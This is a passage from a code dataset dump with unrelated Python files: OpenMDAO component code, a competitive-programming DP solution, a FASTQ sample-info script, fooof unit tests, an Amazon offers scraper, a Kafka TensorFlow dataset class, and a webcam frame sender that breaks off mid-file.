Attributes\n    ----------\n    stdin : str or file object\n        Input stream external code reads from.\n    stdout : str or file object\n        Output stream external code writes to.\n    stderr : str or file object\n        Error stream external code writes to.\n    _external_code_runner : ExternalCodeDelegate object\n        The delegate object that handles all the running of the external code for this object.\n    return_code : int\n        Exit status of the child process.\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        Initialize the ExternalCodeComp component.\n        \"\"\"\n        self._external_code_runner = ExternalCodeDelegate(self)\n        super().__init__(**kwargs)\n\n        self.stdin = DEV_NULL\n        self.stdout = None\n        self.stderr = \"external_code_comp_error.out\"\n\n        self.return_code = 0\n\n    def _declare_options(self):\n        \"\"\"\n        Declare options before kwargs are processed in the init method.\n\n        Options are declared here because this class is intended to be subclassed by\n        the end user. The `initialize` method is left available for user-defined options.\n        \"\"\"\n        super()._declare_options()\n        self._external_code_runner.declare_options()\n\n        # ImplicitComponent has two separate commands to run.\n        self.options.declare('command_apply', [],\n                             desc='command to be executed for apply_nonlinear')\n        self.options.declare('command_solve', [],\n                             desc='command to be executed for solve_nonlinear')\n        self.options.undeclare('command')\n\n    def check_config(self, logger):\n        \"\"\"\n        Perform optional error checks.\n\n        Parameters\n        ----------\n        logger : object\n            The object that manages logging output.\n        \"\"\"\n        self._external_code_runner.check_config(logger)\n\n    def apply_nonlinear(self, inputs, outputs, residuals):\n        \"\"\"\n        Compute residuals given inputs and outputs.\n\n        The model is assumed to be in an unscaled state.\n\n        Parameters\n        ----------\n        inputs : Vector\n            Unscaled, dimensional input variables read via inputs[key].\n        outputs : Vector\n            Unscaled, dimensional output variables read via outputs[key].\n        residuals : Vector\n            Unscaled, dimensional residuals written to via residuals[key].\n        \"\"\"\n        command = self.options['command_apply']\n        if command:\n            self._external_code_runner.run_component(command=command)\n\n    def solve_nonlinear(self, inputs, outputs):\n        \"\"\"\n        Compute outputs given inputs. 
The model is assumed to be in an unscaled state.\n\n Parameters\n ----------\n inputs : Vector\n Unscaled, dimensional input variables read via inputs[key].\n outputs : Vector\n Unscaled, dimensional output variables read via outputs[key].\n \"\"\"\n command = self.options['command_solve']\n if command:\n self._external_code_runner.run_component(command=command)\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/components/external_code_comp.py","file_name":"external_code_comp.py","file_ext":"py","file_size_in_byte":14473,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"8797452639","text":"import sys\nsys.setrecursionlimit(100000000)\nN = int(input())\nC = list(input().split())\nG = [[] for _ in range(N)]\nmod = 10**9 + 7\nfor _ in range(N-1):\n a,b = map(int,input().split())\n a -= 1\n b -= 1\n G[a].append(b)\n G[b].append(a)\ndp = [[-1,-1,-1] for _ in range(N)]\ndef dfs(i,j,pi):\n if dp[i][j] >= 0:\n return dp[i][j]\n if C[i] == 'a':\n cnum = 0\n else:\n cnum = 1\n if j == 1-cnum:\n dp[i][j] = 0\n return 0\n elif j == cnum:\n ans = 1\n for chi in G[i]:\n if chi == pi:\n continue\n # If the edge i-chi is cut, chi's subtree must contain both a and b; if it is kept, it must contain only a (or b).\n ans = ans*(dfs(chi,cnum,i) + dfs(chi,2,i))%mod\n dp[i][cnum] = ans\n else:\n ans = 1\n for chi in G[i]:\n if chi == pi:\n continue\n # First, sum over all child states that satisfy the condition, ignoring i itself\n # If the edge i-chi is cut, chi's subtree must contain both a and b; if it is kept, the condition may still be met in combination with the other children, so every state is OK\n ans = ans*(dfs(chi,0,i) + dfs(chi,1,i) + 2*dfs(chi,2,i))%mod\n # Subtract the cases where the subtree containing i holds only a (or b)\n ans -= dfs(i,cnum,pi)\n ans %= mod\n dp[i][2] = ans\n return ans\nans = dfs(0,2,0)\nprint(ans)","repo_name":"shimamura10/Atcoder","sub_path":"典型90/73_2.py","file_name":"73_2.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22560337255","text":"# coding=utf-8\nimport os\nimport re\nimport json\n__author__ = 'gudeqing'\n\n\ndef get_fastq_info(fastq_info:tuple, pair_info=None, out='fastq.info.json',\n r1_name=\"(.*).R1.fq.gz\", r2_name=\"(.*).R2.fq.gz\",\n link_data=False, add_s_to_numeric_name=False, middle2underscore=False):\n \"\"\"\n :param fastq_info: a list with elements from [fastq file, fastq parent dir, fastq_info.txt, fastq_info.json]\n :param pair_info: pair info file that contains two columns without any header: [tumor_name, normal_name]\n :param r1_name: python regExp that describes the full name of read1 fastq file name. It requires at least one pair of parentheses, and the string matched by the first group will be used as the sample name. Example: '(.*).R1.fq.gz'\n :param r2_name: python regExp that describes the full name of read2 fastq file name. It requires at least one pair of parentheses, and the string matched by the first group will be used as the sample name. 
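# --- Illustrative aside (not part of the original source) -------------------
# How the sample name is recovered from the r1_name pattern documented above;
# the file name used here is made up.
import re
match = re.fullmatch('(.*).R1.fq.gz', 'sampleA.R1.fq.gz')
assert match.groups()[0] == 'sampleA'   # first captured group -> sample name
# ---------------------------------------------------------------------------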
Example: '(.*).R2.fq.gz'\n :param link_data: bool to indicate if to make soft links for fastq files\n :param out: output file that contains three columns: [sample_name, read1_abs_path, read2_abs_path]\n :param add_s_to_numeric_name: bool value to indicate if to add a 'S' letter at the head of the sample name that startswith numeric string.\n :param middle2underscore: bool value to indicate if to transform '-' letter to '_' letter for a sample name.\n :return: result_dict: {sample: [[r1, r1'], [r2, r2']], ...}\n \"\"\"\n result_dict = dict()\n fastq_dirs = []\n fastq_files = []\n for each in fastq_info:\n if os.path.isdir(each):\n fastq_dirs.append(os.path.abspath(each))\n elif os.path.isfile(each):\n if each.endswith(('.fq', 'fq.gz', 'fastq', 'fastq.gz')):\n fastq_files.append(os.path.abspath(each))\n elif each.endswith('.json'):\n with open(each) as f:\n result_dict.update(json.load(f))\n else:\n with open(each) as f:\n for line in f:\n lst = line.strip().split('\\t')\n tmp = result_dict.setdefault(lst[0], list())\n tmp.append(lst[1].split(';'))\n if len(lst) >= 3:\n tmp.append(lst[2].split(';'))\n\n if r1_name == r2_name:\n raise Exception('read1 filename == read2 filename ?!')\n\n if fastq_files:\n for each in fastq_files:\n name = os.path.basename(each)\n directory = os.path.dirname(each)\n is_read1 = True\n match = re.fullmatch(r1_name, name)\n if not match:\n match = re.fullmatch(r2_name, name)\n is_read1 = False\n if match:\n # first matched group is sample name\n sample = match.groups()[0]\n result_dict.setdefault(sample, [[], []])\n if is_read1:\n if each not in result_dict[sample][0]:\n result_dict[sample][0].append(each)\n else:\n print(f'warn: duplicated path found for {each}, and we will only keep the first one!')\n else:\n if each not in result_dict[sample][1]:\n result_dict[sample][1].append(each)\n else:\n print(f'warn: duplicated path found for {each}, and we will only keep the first one!')\n\n if fastq_dirs:\n for path in fastq_dirs:\n for root, dirs, files in os.walk(path):\n for each in files:\n is_read1 = True\n match = re.fullmatch(r1_name, each)\n if not match:\n match = re.fullmatch(r2_name, each)\n is_read1 = False\n if match:\n # first matched group is sample name\n sample = match.groups()[0]\n result_dict.setdefault(sample, [[], []])\n file_path = os.path.join(root, each)\n if is_read1:\n if file_path not in result_dict[sample][0]:\n result_dict[sample][0].append(file_path)\n else:\n print(f'warn: duplicated path found for {file_path}, and we will only keep the first one!')\n else:\n if file_path not in result_dict[sample][1]:\n result_dict[sample][1].append(file_path)\n else:\n print(f'warn: duplicated path found for {file_path}, and we will only keep the first one!')\n\n new_result = dict()\n if link_data:\n os.mkdir('rawdata')\n os.chdir('rawdata')\n for sample, lst in result_dict.items():\n read1 = sorted(lst[0])\n read2 = sorted(lst[1])\n if middle2underscore:\n sample = sample.replace('-', '_')\n if add_s_to_numeric_name:\n if sample.startswith(('0', '1', '2', '3', '4', '5', '6', '7', '8', '9')):\n sample = 'S' + sample\n new_result[sample] = [read1, read2]\n if link_data:\n # make link\n os.mkdir(sample)\n for each in read1:\n os.symlink(each, os.path.join(sample, os.path.basename(each)))\n for each in read2:\n os.symlink(each, os.path.join(sample, os.path.basename(each)))\n\n if pair_info:\n with open(pair_info) as fr, open(out+'.pair', 'w') as f:\n for line in fr:\n tumor, normal = line.strip().split()\n if tumor in new_result and normal in new_result:\n 
tr1 = ';'.join(new_result[tumor][0])\n tr2 = ';'.join(new_result[tumor][1])\n nr1 = ';'.join(new_result[normal][0])\n nr2 = ';'.join(new_result[normal][1])\n lst = [tumor, tr1, tr2, normal, nr1, nr2]\n f.write('\\t'.join(lst) + '\\n')\n else:\n print(f'{tumor} or {normal} fastq is not found !')\n\n if out.endswith('.json'):\n with open(out, 'w') as f:\n json.dump(new_result, f, indent=2)\n else:\n with open(out, 'w') as f:\n for k, v in new_result.items():\n read1 = ';'.join(v[0])\n read2 = ';'.join(v[1])\n f.write('{k}\\t{read1}\\t{read2}\\n'.format(k=k, read1=read1, read2=read2))\n\n return new_result\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-fastq_info', required=True, nargs='+', help=\"A list with elements from [fastq file, fastq parent dir, fastq_info.txt, fastq_info.json].\")\n parser.add_argument('-r1_name', required=True, help=\"python regExp that describes the full name of read1 fastq file name. It requires at least one pair of parentheses, and the string matched by the first group will be used as the sample name. Example: '(.*).R1.fq.gz'\")\n parser.add_argument('-r2_name', required=True, help=\"python regExp that describes the full name of read2 fastq file name. It requires at least one pair of parentheses, and the string matched by the first group will be used as the sample name. Example: '(.*).R2.fq.gz'\")\n parser.add_argument('-out', required=False, default='fastq.info.json', help='output file that contains three columns: [sample_name, read1_abs_path, read2_abs_path]')\n parser.add_argument('-pair_info', required=False, help='pair info file that contains two columns without any header: [tumor, normal]')\n parser.add_argument('--add_s_to_numeric_name', action='store_true', default=False, help=\"if to add a 'S' letter at the head of the sample name that startswith numeric string.\")\n parser.add_argument('--middle2underscore', action='store_true', default=False, help=\"if to transform '-' letter to '_' letter for a sample name\")\n parser.add_argument('--link', action='store_true', default=False, help=\"if to make soft links for the fastq files\")\n args = parser.parse_args()\n get_fastq_info(\n fastq_info=args.fastq_info,\n r1_name=args.r1_name, r2_name=args.r2_name, pair_info=args.pair_info,\n link_data=args.link, out=args.out,\n add_s_to_numeric_name=args.add_s_to_numeric_name,\n middle2underscore=args.middle2underscore\n )\n","repo_name":"gudeqing/basefly","sub_path":"utils/get_fastq_info.py","file_name":"get_fastq_info.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14977531269","text":"import numpy as np\n\n\ndef get_trainX_trainY(window, grouped_X_len, grouped_Y_len, fin_X_shape, fin_Y_shape):\n trainX = []\n trainY = []\n for i in range(0, len(window)):\n x = []\n for jx in range(0, grouped_X_len):\n for kx in window[i][jx]:\n x.append(kx)\n y = []\n for jy in range(grouped_X_len, grouped_X_len + grouped_Y_len):\n for ky in window[i][jy]:\n y.append(ky)\n trainX.append(x)\n trainY.append(y)\n trainX = np.array(trainX)\n trainY = np.array(trainY)\n trainX = np.reshape(trainX, (len(window), fin_X_shape[0], fin_X_shape[1]))\n trainY = np.reshape(trainY, (len(window), fin_Y_shape[0], fin_Y_shape[1]))\n return np.array(trainX), 
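# --- Illustrative aside (not part of the original source) -------------------
# Programmatic use of get_fastq_info(); the input directory is hypothetical.
# Per the docstring above, the return value maps each sample to its grouped
# reads, {sample: [[r1, r1', ...], [r2, r2', ...]], ...}, and the same mapping
# is written to 'fastq.info.json'.
fastq_dict = get_fastq_info(
    fastq_info=['/data/project1/rawdata'],           # hypothetical path
    r1_name='(.*).R1.fq.gz', r2_name='(.*).R2.fq.gz',
    out='fastq.info.json')
# ---------------------------------------------------------------------------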
np.array(trainY)\n\n","repo_name":"AntonioShen/Antiburnt_deeplearning","sub_path":"version_2/Helper/TrainingSetHelper.py","file_name":"TrainingSetHelper.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5235682826","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef getheadsetAZ():\n page = requests.get(\"https://www.amazon.com.mx/b/ref=s9_acss_bw_cg_vgps4_2c1_w?node=17883788011&pf_rd_m=A3TO6F13CSVUA4&pf_rd_s=merchandised-search-4&pf_rd_r=NBK4S017KQ596XKHA2EM&pf_rd_t=101&pf_rd_p=2adca235-f694-4012-b6af-c2aa0998654d&pf_rd_i=17883787011\", verify=True)\n soup = BeautifulSoup(page.content, 'html.parser')\n container_items_offers = soup.find(class_=\"acswidget acswidget-carousel celwidget a-spacing-base acswidget-carousel--shoveler acswidget-carousel--default\")\n offers = container_items_offers.find_all(class_='a-section acs-product-block acs-product-block--default')\n\n itemsML = []\n for o in offers:\n today_offer = o.find(class_='a-section a-spacing-micro acs-product-block__price')\n if today_offer:\n url = o.find(class_='a-color-base a-link-normal')\n print(url['href'])\n img = o.find('img')\n old_price = o.find(class_='a-price acs-product-block__price--strikethrough').get_text()\n new_price = o.find(class_='a-price acs-product-block__price--buying')\n new_price_span = new_price.find('span').get_text()\n title = o.find('p').get_text()\n data = {\n 'item': {\n 'url': url['href'],\n 'img': img['data-src'],\n 'title': title,\n 'old_price': old_price,\n 'new_price_span': new_price_span\n }\n }\n itemsML.append(data)\n print(itemsML)\n return itemsML\n\n\ngetheadsetAZ()\n\n","repo_name":"Anakinstone/zoom-prototype-Django-","sub_path":"comparador/scrappers/headsetsAZ.py","file_name":"headsetsAZ.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2354033838","text":"\"\"\"Tests for fooof.objs.fit, including the FOOOF object and it's methods.\n\nNOTES\n-----\nThe tests here are not strong tests for accuracy.\nThey serve rather as 'smoke tests', for if anything fails completely.\n\"\"\"\n\nimport numpy as np\nfrom py.test import raises\n\nfrom fooof.core.items import OBJ_DESC\nfrom fooof.core.errors import FitError\nfrom fooof.core.utils import group_three\nfrom fooof.sim import gen_power_spectrum\nfrom fooof.data import FOOOFSettings, FOOOFMetaData, FOOOFResults\nfrom fooof.core.errors import DataError, NoDataError, InconsistentDataError\n\nfrom fooof.tests.settings import TEST_DATA_PATH\nfrom fooof.tests.tutils import get_tfm, plot_test\n\nfrom fooof.objs.fit import *\n\n###################################################################################################\n###################################################################################################\n\ndef test_fooof():\n \"\"\"Check FOOOF object initializes properly.\"\"\"\n\n assert FOOOF(verbose=False)\n\ndef test_fooof_has_data(tfm):\n \"\"\"Test the has_data property attribute, with and without model fits.\"\"\"\n\n assert tfm.has_data\n\n ntfm = FOOOF()\n assert not ntfm.has_data\n\ndef test_fooof_has_model(tfm):\n \"\"\"Test the has_model property attribute, with and without model fits.\"\"\"\n\n assert tfm.has_model\n\n ntfm = FOOOF()\n assert not ntfm.has_model\n\ndef test_fooof_n_peaks(tfm):\n \"\"\"Test the n_peaks property attribute.\"\"\"\n\n assert tfm.n_peaks_\n\ndef test_fooof_fit_nk():\n 
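# --- Illustrative aside (not part of the original source) -------------------
# A tiny worked example of get_trainX_trainY() from TrainingSetHelper above:
# two windows, each holding 3 timesteps of 2 features; the first 2 timesteps
# become X and the last one becomes Y.
window = [
    [[1, 2], [3, 4], [5, 6]],
    [[7, 8], [9, 10], [11, 12]],
]
trainX, trainY = get_trainX_trainY(window, grouped_X_len=2, grouped_Y_len=1,
                                   fin_X_shape=(2, 2), fin_Y_shape=(1, 2))
# trainX.shape == (2, 2, 2) and trainY.shape == (2, 1, 2)
# ---------------------------------------------------------------------------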
\"\"\"Test FOOOF fit, no knee.\"\"\"\n\n ap_params = [50, 2]\n gauss_params = [10, 0.5, 2, 20, 0.3, 4]\n nlv = 0.0025\n\n xs, ys = gen_power_spectrum([3, 50], ap_params, gauss_params, nlv)\n\n tfm = FOOOF(verbose=False)\n tfm.fit(xs, ys)\n\n # Check model results - aperiodic parameters\n assert np.allclose(ap_params, tfm.aperiodic_params_, [0.5, 0.1])\n\n # Check model results - gaussian parameters\n for ii, gauss in enumerate(group_three(gauss_params)):\n assert np.allclose(gauss, tfm.gaussian_params_[ii], [2.0, 0.5, 1.0])\n\ndef test_fooof_fit_nk_noise():\n \"\"\"Test FOOOF fit on noisy data, to make sure nothing breaks.\"\"\"\n\n ap_params = [50, 2]\n gauss_params = [10, 0.5, 2, 20, 0.3, 4]\n nlv = 1.0\n\n xs, ys = gen_power_spectrum([3, 50], ap_params, gauss_params, nlv)\n\n tfm = FOOOF(max_n_peaks=8, verbose=False)\n tfm.fit(xs, ys)\n\n # No accuracy checking here - just checking that it ran\n assert tfm.has_model\n\ndef test_fooof_fit_knee():\n \"\"\"Test FOOOF fit, with a knee.\"\"\"\n\n ap_params = [50, 10, 1]\n gauss_params = [10, 0.3, 2, 20, 0.1, 4, 60, 0.3, 1]\n nlv = 0.0025\n\n xs, ys = gen_power_spectrum([1, 150], ap_params, gauss_params, nlv)\n\n tfm = FOOOF(aperiodic_mode='knee', verbose=False)\n tfm.fit(xs, ys)\n\n # Check model results - aperiodic parameters\n assert np.allclose(ap_params, tfm.aperiodic_params_, [1, 2, 0.2])\n\n # Check model results - gaussian parameters\n for ii, gauss in enumerate(group_three(gauss_params)):\n assert np.allclose(gauss, tfm.gaussian_params_[ii], [2.0, 0.5, 1.0])\n\ndef test_fooof_fit_measures():\n \"\"\"Test goodness of fit & error metrics, post model fitting.\"\"\"\n\n tfm = FOOOF(verbose=False)\n\n # Hack fake data with known properties: total error magnitude 2\n tfm.power_spectrum = np.array([1, 2, 3, 4, 5])\n tfm.fooofed_spectrum_ = np.array([1, 2, 5, 4, 5])\n\n # Check default goodness of fit and error measures\n tfm._calc_r_squared()\n assert np.isclose(tfm.r_squared_, 0.75757575)\n tfm._calc_error()\n assert np.isclose(tfm.error_, 0.4)\n\n # Check with alternative error fit approach\n tfm._calc_error(metric='MSE')\n assert np.isclose(tfm.error_, 0.8)\n tfm._calc_error(metric='RMSE')\n assert np.isclose(tfm.error_, np.sqrt(0.8))\n with raises(ValueError):\n tfm._calc_error(metric='BAD')\n\ndef test_fooof_checks():\n \"\"\"Test various checks, errors and edge cases in FOOOF.\n This tests all the input checking done in `_prepare_data`.\n \"\"\"\n\n xs, ys = gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2])\n\n tfm = FOOOF(verbose=False)\n\n ## Check checks & errors done in `_prepare_data`\n\n # Check wrong data type error\n with raises(DataError):\n tfm.fit(list(xs), list(ys))\n\n # Check dimension error\n with raises(DataError):\n tfm.fit(xs, np.reshape(ys, [1, len(ys)]))\n\n # Check shape mismatch error\n with raises(InconsistentDataError):\n tfm.fit(xs[:-1], ys)\n\n # Check complex inputs error\n with raises(DataError):\n tfm.fit(xs, ys.astype('complex'))\n\n # Check trim_spectrum range\n tfm.fit(xs, ys, [3, 40])\n\n # Check freq of 0 issue\n xs, ys = gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2])\n tfm.fit(xs, ys)\n assert tfm.freqs[0] != 0\n\n # Check error if there is a post-logging inf or nan\n with raises(DataError): # Double log (1) -> -inf\n tfm.fit(np.array([1, 2, 3]), np.log10(np.array([1, 2, 3])))\n with raises(DataError): # Log (-1) -> NaN\n tfm.fit(np.array([1, 2, 3]), np.array([-1, 2, 3]))\n\n ## Check errors & errors done in `fit`\n\n # Check fit, and string report model error (no data / model fit)\n tfm = 
FOOOF(verbose=False)\n with raises(NoDataError):\n tfm.fit()\n\ndef test_fooof_load():\n \"\"\"Test load into FOOOF. Note: loads files from test_core_io.\"\"\"\n\n # Test loading just results\n tfm = FOOOF(verbose=False)\n file_name_res = 'test_fooof_res'\n tfm.load(file_name_res, TEST_DATA_PATH)\n # Check that result attributes get filled\n for result in OBJ_DESC['results']:\n assert not np.all(np.isnan(getattr(tfm, result)))\n # Test that settings and data are None\n # Except for aperiodic mode, which can be inferred from the data\n for setting in OBJ_DESC['settings']:\n if setting != 'aperiodic_mode':\n assert getattr(tfm, setting) is None\n assert getattr(tfm, 'power_spectrum') is None\n\n # Test loading just settings\n tfm = FOOOF(verbose=False)\n file_name_set = 'test_fooof_set'\n tfm.load(file_name_set, TEST_DATA_PATH)\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) is not None\n # Test that results and data are None\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n assert tfm.power_spectrum is None\n\n # Test loading just data\n tfm = FOOOF(verbose=False)\n file_name_dat = 'test_fooof_dat'\n tfm.load(file_name_dat, TEST_DATA_PATH)\n assert tfm.power_spectrum is not None\n # Test that settings and results are None\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) is None\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n\n # Test loading all elements\n tfm = FOOOF(verbose=False)\n file_name_all = 'test_fooof_all'\n tfm.load(file_name_all, TEST_DATA_PATH)\n for result in OBJ_DESC['results']:\n assert not np.all(np.isnan(getattr(tfm, result)))\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) is not None\n for data in OBJ_DESC['data']:\n assert getattr(tfm, data) is not None\n for meta_dat in OBJ_DESC['meta_data']:\n assert getattr(tfm, meta_dat) is not None\n\ndef test_adds():\n \"\"\"Tests methods that add data to FOOOF objects.\n\n Checks: add_data, add_settings, add_results.\n \"\"\"\n\n # Note: uses its own tfm, to not add stuff to the global one\n tfm = get_tfm()\n\n # Test adding data\n freqs, pows = np.array([1, 2, 3]), np.array([10, 10, 10])\n tfm.add_data(freqs, pows)\n assert np.all(tfm.freqs == freqs)\n assert np.all(tfm.power_spectrum == np.log10(pows))\n\n # Test adding settings\n fooof_settings = FOOOFSettings([1, 4], 6, 0, 2, 'fixed')\n tfm.add_settings(fooof_settings)\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) == getattr(fooof_settings, setting)\n\n # Test adding meta data\n fooof_meta_data = FOOOFMetaData([3, 40], 0.5)\n tfm.add_meta_data(fooof_meta_data)\n for meta_dat in OBJ_DESC['meta_data']:\n assert getattr(tfm, meta_dat) == getattr(fooof_meta_data, meta_dat)\n\n # Test adding results\n fooof_results = FOOOFResults([1, 1], [10, 0.5, 0.5], 0.95, 0.02, [10, 0.5, 0.25])\n tfm.add_results(fooof_results)\n for setting in OBJ_DESC['results']:\n assert getattr(tfm, setting) == getattr(fooof_results, setting.strip('_'))\n\ndef test_obj_gets(tfm):\n \"\"\"Tests methods that return FOOOF data objects.\n\n Checks: get_settings, get_meta_data, get_results\n \"\"\"\n\n settings = tfm.get_settings()\n assert isinstance(settings, FOOOFSettings)\n meta_data = tfm.get_meta_data()\n assert isinstance(meta_data, FOOOFMetaData)\n results = tfm.get_results()\n assert isinstance(results, FOOOFResults)\n\ndef test_get_params(tfm):\n \"\"\"Test the get_params method.\"\"\"\n\n for dname in ['aperiodic_params', 
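# --- Illustrative aside (not part of the original source) -------------------
# The accessor pattern covered by test_obj_gets()/test_get_params() above,
# assuming `fm` is an already-fitted FOOOF object:
settings = fm.get_settings()               # -> FOOOFSettings
results = fm.get_results()                 # -> FOOOFResults
exponent = fm.get_params('aperiodic_params', 'exponent')
peaks = fm.get_params('peak_params')       # all [CF, PW, BW] rows
# ---------------------------------------------------------------------------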
'aperiodic', 'peak_params', 'peak',\n 'error', 'r_squared', 'gaussian_params', 'gaussian']:\n assert np.any(tfm.get_params(dname))\n\n if dname == 'aperiodic_params' or dname == 'aperiodic':\n for dtype in ['offset', 'exponent']:\n assert np.any(tfm.get_params(dname, dtype))\n\n if dname == 'peak_params' or dname == 'peak':\n for dtype in ['CF', 'PW', 'BW']:\n assert np.any(tfm.get_params(dname, dtype))\n\ndef test_copy():\n \"\"\"Test copy FOOOF method.\"\"\"\n\n tfm = FOOOF(verbose=False)\n ntfm = tfm.copy()\n\n assert tfm != ntfm\n\ndef test_fooof_prints(tfm):\n \"\"\"Test methods that print (alias and pass through methods).\n\n Checks: print_settings, print_results, print_report_issue.\n \"\"\"\n\n tfm.print_settings()\n tfm.print_results()\n tfm.print_report_issue()\n\n@plot_test\ndef test_fooof_plot(tfm, skip_if_no_mpl):\n \"\"\"Check the alias to plot FOOOF.\"\"\"\n\n tfm.plot()\n\ndef test_fooof_resets():\n \"\"\"Check that all relevant data is cleared in the reset method.\"\"\"\n\n # Note: uses its own tfm, to not clear the global one\n tfm = get_tfm()\n\n tfm._reset_data_results(True, True, True)\n tfm._reset_internal_settings()\n\n for data in ['data', 'model_components']:\n for field in OBJ_DESC[data]:\n assert getattr(tfm, field) is None\n for field in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, field)))\n assert tfm.freqs is None and tfm.fooofed_spectrum_ is None\n\ndef test_fooof_report(skip_if_no_mpl):\n \"\"\"Check that running the top level model method runs.\"\"\"\n\n tfm = FOOOF(verbose=False)\n\n tfm.report(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n\n assert tfm\n\ndef test_fooof_fit_failure():\n \"\"\"Test FOOOF fit failures.\"\"\"\n\n ## Induce a runtime error, and check it runs through\n tfm = FOOOF(verbose=False)\n tfm._maxfev = 5\n\n tfm.fit(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n\n # Check after failing out of fit, all results are reset\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n\n ## Monkey patch to check errors in general\n # This mimics the main fit-failure, without requiring bad data / waiting for it to fail.\n tfm = FOOOF(verbose=False)\n def raise_runtime_error(*args, **kwargs):\n raise FitError('Test-MonkeyPatch')\n tfm._fit_peaks = raise_runtime_error\n\n # Run a FOOOF fit - this should raise an error, but continue in try/except\n tfm.fit(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n\n # Check after failing out of fit, all results are reset\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n\ndef test_fooof_debug():\n \"\"\"Test FOOOF fit failure in debug mode.\"\"\"\n\n tfm = FOOOF(verbose=False)\n tfm._maxfev = 5\n\n tfm.set_debug_mode(True)\n assert tfm._debug is True\n\n with raises(FitError):\n tfm.fit(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n","repo_name":"JohnGriffiths/eeg_notebooks_doc","sub_path":"fooof/tests/objs/test_fit.py","file_name":"test_fit.py","file_ext":"py","file_size_in_byte":11969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8442009452","text":"from django.conf.urls import url\nfrom . 
import views\n\n\nurlpatterns = [\n url(r'^$', views.home,\n name='home'),\n url(r'^delete/$', views.delete_member,\n name='delete'),\n url(r'^get_pple/$', views.get_list_of_pple,\n name='get_pple'),\n url(r'^change_typemember/$', views.change_typemember,\n name='change_typemember'),\n url(r'^send_mail/$', views.send_mail,\n name='send_mail'),\n]\n","repo_name":"unistra/eva","sub_path":"mecc/apps/commission/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34426163975","text":"from tensorflow.python.data.ops import readers\nimport tensorflow as tf\nfrom deepray.datasets.datapipeline import DataPipeLine\nfrom absl import flags\n\nFLAGS = flags.FLAGS\n\n\nclass KafkaDataset(DataPipeLine):\n\n def parse(self, raw_message, raw_key):\n context_features, sequence_features = {}, {}\n for key, dim in self.feature_map[\"FLOAT\"].items():\n context_features[key] = tf.io.FixedLenFeature([], tf.float32)\n for key, dim in self.feature_map[\"INT\"].items():\n context_features[key] = tf.io.FixedLenFeature([], tf.int64)\n for key, dim in self.feature_map[\"VARINT\"].items():\n sequence_features[key] = tf.io.VarLenFeature(tf.int64)\n\n tensor, sparse_tensor = tf.io.parse_single_sequence_example(\n serialized=raw_message, context_features=context_features, sequence_features=sequence_features\n )\n reshaped_tensor = {}\n for fea in context_features:\n reshaped_tensor[fea] = tensor[fea]\n # reshaped_tensor[fea] = tf.reshape(tensor[fea], [1])\n label = reshaped_tensor.pop(FLAGS.label)\n for fea in sequence_features:\n reshaped_tensor[fea] = sparse_tensor[fea]\n # reshaped_tensor[fea] = tf.sparse.reshape(sparse_tensor[fea], [-1])\n return reshaped_tensor, label\n\n def build_dataset(self):\n dataset = (\n readers.KafkaGroupIODataset(\n topics=self.conf[\"Kafka\"][\"topics\"],\n group_id=self.conf[\"Kafka\"][\"group_id\"],\n servers=self.conf[\"Kafka\"][\"servers\"],\n stream_timeout=3000,\n configuration=self.conf[\"Kafka\"][\"configuration\"],\n ).map(map_func=self.parse, num_parallel_calls=FLAGS.parallel_parse).batch(FLAGS.batch_size)\n )\n return dataset\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/datasets/kafka_dataset.py","file_name":"kafka_dataset.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"38224331045","text":"import argparse\nimport cv2\nimport datetime\nimport requests\n\nfrom image_processing import crop_face_transform\nimport utils\n\n\ndef send_frames(video, addr, size=(360, 240), fps=10, frames_to_send=-1, crop=False, print_interval=-1, log=None):\n crop_str = \"True\" if crop else \"False\"\n full_address = f\"{addr}/cropped={crop_str}&width={size[0]}&height={size[1]}\"\n\n send_forever = (frames_to_send == -1)\n\n frames_sent = 0\n\n fps_tracker = utils.FpsTracker(fps_limit=fps, average_over=10, print_interval=print_interval, log=log)\n fps_tracker.track()\n while frames_sent < frames_to_send or send_forever:\n success, frame = video.read()\n if not success:\n print(\"ERROR: Could not capture from web cam\")\n break\n\n if crop:\n frame = crop_face_transform(frame)[\"img\"]\n\n frame = cv2.resize(frame, dsize=size)\n\n 